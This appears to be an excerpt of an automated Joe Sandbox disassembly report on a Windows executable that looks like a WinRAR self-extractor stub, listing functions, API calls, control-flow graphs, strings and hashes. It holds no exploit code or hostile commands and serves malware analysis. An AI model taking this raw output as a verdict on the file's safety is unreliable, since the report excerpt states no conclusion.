                                                                                              control_flow_graph 1025 caa69b-caa6bf call cbec50 1028 caa6c1-caa6ce FindFirstFileW 1025->1028 1029 caa727-caa730 FindNextFileW 1025->1029 1030 caa742-caa7ff call cb0602 call cac310 call cb15da * 3 1028->1030 1031 caa6d0-caa6e2 call cabb03 1028->1031 1029->1030 1032 caa732-caa740 GetLastError 1029->1032 1037 caa804-caa811 1030->1037 1039 caa6fe-caa707 GetLastError 1031->1039 1040 caa6e4-caa6fc FindFirstFileW 1031->1040 1034 caa719-caa722 1032->1034 1034->1037 1043 caa709-caa70c 1039->1043 1044 caa717 1039->1044 1040->1030 1040->1039 1043->1044 1046 caa70e-caa711 1043->1046 1044->1034 1046->1044 1048 caa713-caa715 1046->1048 1048->1034
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA728
                                                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA734
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: a40ca5b5e1c166be91db8245beeed0b6c0b28b41296915de75eeb4a039ba72a5
                                                                                              • Instruction ID: 061d1d20a3d1d9b19154c178986287fcddf59f7c23872170e6ee96712057e01e
                                                                                              • Opcode Fuzzy Hash: a40ca5b5e1c166be91db8245beeed0b6c0b28b41296915de75eeb4a039ba72a5
                                                                                              • Instruction Fuzzy Hash: 0A41CE72900516ABCB25DF68CC88BEEB7B8FB49350F004196F969E3210D7346E94CF91
                                                                                              Function 00CC7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002,00000000), ref: 00CC7E0F
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00CC7DC4,00000000,00CDC300,0000000C,00CC7F1B,00000000,00000002,00000000), ref: 00CC7E16
                                                                                              • ExitProcess.KERNEL32 ref: 00CC7E28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 78f024125259ac2491d7fa47ed17173bd1253d1b7a5dca8a0a1cca79eff5b849
                                                                                              • Instruction ID: 5964a7dbf308e2252afbd4d442ae67ad4398d57d0bab2fad6ecaff0cd394d3b9
                                                                                              • Opcode Fuzzy Hash: 78f024125259ac2491d7fa47ed17173bd1253d1b7a5dca8a0a1cca79eff5b849
                                                                                              • Instruction Fuzzy Hash: 74E0B632005188AFCF116F64DD0AF4E7F6AEB50341F04455DF819AA172CB3AEE92DA91
                                                                                              Function 00CA848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 967a58a946f859d2ef660618e5e1d8bb337b610ec58e1197043dcc94b1734850
                                                                                              • Instruction ID: 9531fe5b9fd9112753c3a96558579ea770b07dc488426c470a08c3315f07bdef
                                                                                              • Opcode Fuzzy Hash: 967a58a946f859d2ef660618e5e1d8bb337b610ec58e1197043dcc94b1734850
                                                                                              • Instruction Fuzzy Hash: D182FA70904147AFDF15DB64C895BFABBB9AF07308F0841B9E8599B182DB315B8CDB60
                                                                                              Function 00CBB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CBB7E5
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBB8D1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB8EF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00CBB902
                                                                                              • TranslateMessage.USER32(?), ref: 00CBB910
                                                                                              • DispatchMessageW.USER32(?), ref: 00CBB91A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CBB93D
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00CBB960
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBB983
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBB99E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBB9B1
                                                                                                • Part of subcall function 00CBD453: _wcslen.LIBCMT ref: 00CBD47D
                                                                                              • SetFocus.USER32(00000000), ref: 00CBB9B8
                                                                                              • _swprintf.LIBCMT ref: 00CBBA24
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                                • Part of subcall function 00CBD4D4: GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                                                                • Part of subcall function 00CBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CBBA68
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CBBA90
                                                                                              • GetTickCount.KERNEL32 ref: 00CBBAAE
                                                                                              • _swprintf.LIBCMT ref: 00CBBAC2
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00CBBAF4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CBBB43
                                                                                              • _swprintf.LIBCMT ref: 00CBBB7C
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CBBBD0
                                                                                              • GetCommandLineW.KERNEL32 ref: 00CBBBEA
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CBBC47
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CBBC6F
                                                                                              • Sleep.KERNEL32(00000064), ref: 00CBBCB9
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CBBCE2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CBBCEB
                                                                                              • _swprintf.LIBCMT ref: 00CBBD1E
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBD7D
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00CD35F4), ref: 00CBBD94
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBBD9D
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBBDAC
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CBBDBB
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBE68
                                                                                              • _wcslen.LIBCMT ref: 00CBBEBE
                                                                                              • _swprintf.LIBCMT ref: 00CBBEE8
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBBF32
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CBBF4C
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBBF55
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CBBF6B
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBBF85
                                                                                              • SetWindowTextW.USER32(00000000,00CEA472), ref: 00CBBFA7
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CBC007
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC01A
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CBC0BD
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00CBC197
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CBC1D9
                                                                                                • Part of subcall function 00CBC73F: __EH_prolog.LIBCMT ref: 00CBC744
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC1FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3445078344-2238251102
                                                                                              • Opcode ID: 87bd478585e532fa634fa8d0ce7ca3ae21237732202ef745e70eb8ea02cee49f
                                                                                              • Instruction ID: 58acf8636aab97359d517737fcdfb19e305b51ced1f4daab384fd97a2fdc5da4
                                                                                              • Opcode Fuzzy Hash: 87bd478585e532fa634fa8d0ce7ca3ae21237732202ef745e70eb8ea02cee49f
                                                                                              • Instruction Fuzzy Hash: E142E670944399BEEB219BB09C8AFFE7B7CAB01700F040055F655E61E2CBB49E45DB62
                                                                                              Function 00CB0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 268 cb0863-cb0886 call cbec50 GetModuleHandleW 271 cb0888-cb089f GetProcAddress 268->271 272 cb08e7-cb0b48 268->272 273 cb08b9-cb08c9 GetProcAddress 271->273 274 cb08a1-cb08b7 271->274 275 cb0b4e-cb0b59 call cc75fb 272->275 276 cb0c14-cb0c40 GetModuleFileNameW call cac29a call cb0602 272->276 277 cb08cb-cb08e0 273->277 278 cb08e5 273->278 274->273 275->276 284 cb0b5f-cb0b8d GetModuleFileNameW CreateFileW 275->284 290 cb0c42-cb0c4e call cab146 276->290 277->278 278->272 287 cb0c08-cb0c0f CloseHandle 284->287 288 cb0b8f-cb0b9b SetFilePointer 284->288 287->276 288->287 291 cb0b9d-cb0bb9 ReadFile 288->291 297 cb0c7d-cb0ca4 call cac310 GetFileAttributesW 290->297 298 cb0c50-cb0c5b call cb081b 290->298 291->287 294 cb0bbb-cb0be0 291->294 296 cb0bfd-cb0c06 call cb0371 294->296 296->287 305 cb0be2-cb0bfc call cb081b 296->305 308 cb0cae 297->308 309 cb0ca6-cb0caa 297->309 298->297 307 cb0c5d-cb0c7b CompareStringW 298->307 305->296 307->297 307->309 312 cb0cb0-cb0cb5 308->312 309->290 311 cb0cac 309->311 311->312 313 cb0cec-cb0cee 312->313 314 cb0cb7 312->314 315 cb0dfb-cb0e05 313->315 316 cb0cf4-cb0d0b call cac2e4 call cab146 313->316 317 cb0cb9-cb0ce0 call cac310 GetFileAttributesW 314->317 327 cb0d0d-cb0d6e call cb081b * 2 call cae617 call ca4092 call cae617 call cba7e4 316->327 328 cb0d73-cb0da6 call ca4092 AllocConsole 316->328 322 cb0cea 317->322 323 cb0ce2-cb0ce6 317->323 322->313 323->317 325 cb0ce8 323->325 325->313 334 cb0df3-cb0df5 ExitProcess 327->334 333 cb0da8-cb0ded GetCurrentProcessId AttachConsole call cc3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0B69
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB0B83
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB0B93
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00CD3C7C,00000000), ref: 00CB0BB1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CB0C09
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0C1E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CD3C7C,?,00000000,?,00000800), ref: 00CB0C72
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00CD3C7C,00000800,?,00000000,?,00000800), ref: 00CB0C9C
                                                                                              • GetFileAttributesW.KERNEL32(?,?,00CD3D44,00000800), ref: 00CB0CD8
                                                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              • _swprintf.LIBCMT ref: 00CB0D4A
                                                                                              • _swprintf.LIBCMT ref: 00CB0D96
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • AllocConsole.KERNEL32 ref: 00CB0D9E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00CB0DA8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00CB0DAF
                                                                                              • _wcslen.LIBCMT ref: 00CB0DC4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CB0DD5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00CB0DDC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00CB0DE7
                                                                                              • FreeConsole.KERNEL32 ref: 00CB0DED
                                                                                              • ExitProcess.KERNEL32 ref: 00CB0DF5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 1207345701-3298887752
                                                                                              • Opcode ID: b6691015d11a73f0fd585984e586f79b774796336c63363de6f45899c061cc30
                                                                                              • Instruction ID: 0837d853fbedae741bdb9098857ec13a266dc29f47764ac0f82345a9ecbc4401
                                                                                              • Opcode Fuzzy Hash: b6691015d11a73f0fd585984e586f79b774796336c63363de6f45899c061cc30
                                                                                              • Instruction Fuzzy Hash: 67D151F10093C5ABDB219F50C849BDFBBE8BB85704F50491EF39996291DBB09648CB63
                                                                                              Function 00CBC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 347 cbc73f-cbc757 call cbeb78 call cbec50 352 cbd40d-cbd418 347->352 353 cbc75d-cbc787 call cbb314 347->353 353->352 356 cbc78d-cbc792 353->356 357 cbc793-cbc7a1 356->357 358 cbc7a2-cbc7b7 call cbaf98 357->358 361 cbc7b9 358->361 362 cbc7bb-cbc7d0 call cb1fbb 361->362 365 cbc7dd-cbc7e0 362->365 366 cbc7d2-cbc7d6 362->366 368 cbd3d9-cbd404 call cbb314 365->368 369 cbc7e6 365->369 366->362 367 cbc7d8 366->367 367->368 368->357 380 cbd40a-cbd40c 368->380 371 cbca5f-cbca61 369->371 372 cbc9be-cbc9c0 369->372 373 cbc7ed-cbc7f0 369->373 374 cbca7c-cbca7e 369->374 371->368 376 cbca67-cbca77 SetWindowTextW 371->376 372->368 378 cbc9c6-cbc9d2 372->378 373->368 379 cbc7f6-cbc850 call cba64d call cabdf3 call caa544 call caa67e call ca6edb 373->379 374->368 377 cbca84-cbca8b 374->377 376->368 377->368 381 cbca91-cbcaaa 377->381 382 cbc9e6-cbc9eb 378->382 383 cbc9d4-cbc9e5 call cc7686 378->383 435 cbc98f-cbc9a4 call caa5d1 379->435 380->352 385 cbcaac 381->385 386 cbcab2-cbcac0 call cc3e13 381->386 389 cbc9ed-cbc9f3 382->389 390 cbc9f5-cbca00 call cbb48e 382->390 383->382 385->386 386->368 404 cbcac6-cbcacf 386->404 391 cbca05-cbca07 389->391 390->391 397 cbca09-cbca10 call cc3e13 391->397 398 cbca12-cbca32 call cc3e13 call cc3e3e 391->398 397->398 424 cbca4b-cbca4d 398->424 425 cbca34-cbca3b 398->425 408 cbcaf8-cbcafb 404->408 409 cbcad1-cbcad5 404->409 410 cbcb01-cbcb04 408->410 413 cbcbe0-cbcbee call cb0602 408->413 409->410 411 cbcad7-cbcadf 409->411 418 cbcb11-cbcb2c 410->418 419 cbcb06-cbcb0b 410->419 411->368 416 cbcae5-cbcaf3 call cb0602 411->416 426 cbcbf0-cbcc04 call cc279b 413->426 416->426 436 cbcb2e-cbcb68 418->436 437 cbcb76-cbcb7d 418->437 419->413 419->418 424->368 427 cbca53-cbca5a call cc3e2e 424->427 431 cbca3d-cbca3f 425->431 432 cbca42-cbca4a call cc7686 425->432 446 cbcc11-cbcc62 call cb0602 call cbb1be GetDlgItem SetWindowTextW SendMessageW call cc3e49 426->446 447 cbcc06-cbcc0a 426->447 427->368 431->432 432->424 453 cbc9aa-cbc9b9 call caa55a 435->453 454 cbc855-cbc869 SetFileAttributesW 435->454 470 cbcb6a 436->470 471 cbcb6c-cbcb6e 436->471 440 cbcbab-cbcbce call cc3e13 * 2 437->440 441 cbcb7f-cbcb97 call cc3e13 437->441 440->426 475 cbcbd0-cbcbde call cb05da 440->475 441->440 457 cbcb99-cbcba6 call cb05da 441->457 481 cbcc67-cbcc6b 446->481 447->446 452 cbcc0c-cbcc0e 447->452 452->446 453->368 459 cbc90f-cbc91f GetFileAttributesW 454->459 460 cbc86f-cbc8a2 call cab991 call cab690 call cc3e13 454->460 457->440 459->435 468 cbc921-cbc930 DeleteFileW 459->468 491 cbc8b5-cbc8c3 call cabdb4 460->491 492 cbc8a4-cbc8b3 call cc3e13 460->492 468->435 474 cbc932-cbc935 468->474 470->471 471->437 478 cbc939-cbc965 call ca4092 GetFileAttributesW 474->478 475->426 487 cbc937-cbc938 478->487 488 cbc967-cbc97d MoveFileW 478->488 481->368 486 cbcc71-cbcc85 SendMessageW 481->486 486->368 487->478 488->435 490 cbc97f-cbc989 MoveFileExW 488->490 490->435 491->453 497 cbc8c9-cbc908 call cc3e13 call cbfff0 491->497 492->491 492->497 497->459
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CBC744
                                                                                                • Part of subcall function 00CBB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CBB3FB
                                                                                              • _wcslen.LIBCMT ref: 00CBCA0A
                                                                                              • _wcslen.LIBCMT ref: 00CBCA13
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00CBCA71
                                                                                              • _wcslen.LIBCMT ref: 00CBCAB3
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 00CBCBFB
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBCC36
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00CBCC46
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,00CEA472), ref: 00CBCC54
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CBCC7F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 2804936435-312220925
                                                                                              • Opcode ID: cc3b44dacd8516891cb6563d071c887e69dc8ded44e163978a380aed239c23d3
                                                                                              • Instruction ID: 99991f081c396ea5f5c39c5bf91783011645443057f5cbca505dfc2e25d467af
                                                                                              • Opcode Fuzzy Hash: cc3b44dacd8516891cb6563d071c887e69dc8ded44e163978a380aed239c23d3
                                                                                              • Instruction Fuzzy Hash: 7EE163B2900259AADF24DBA0DC85EEE73BCAB04350F4040AAF619E7151EF749F44DF61
                                                                                              Function 00CADA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CADA70
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CADAAC
                                                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                                                                • Part of subcall function 00CB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CABAE9,00000000,?,?,?,0001046E), ref: 00CB1BA0
                                                                                              • _wcslen.LIBCMT ref: 00CADDE9
                                                                                              • __fprintf_l.LIBCMT ref: 00CADF1C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
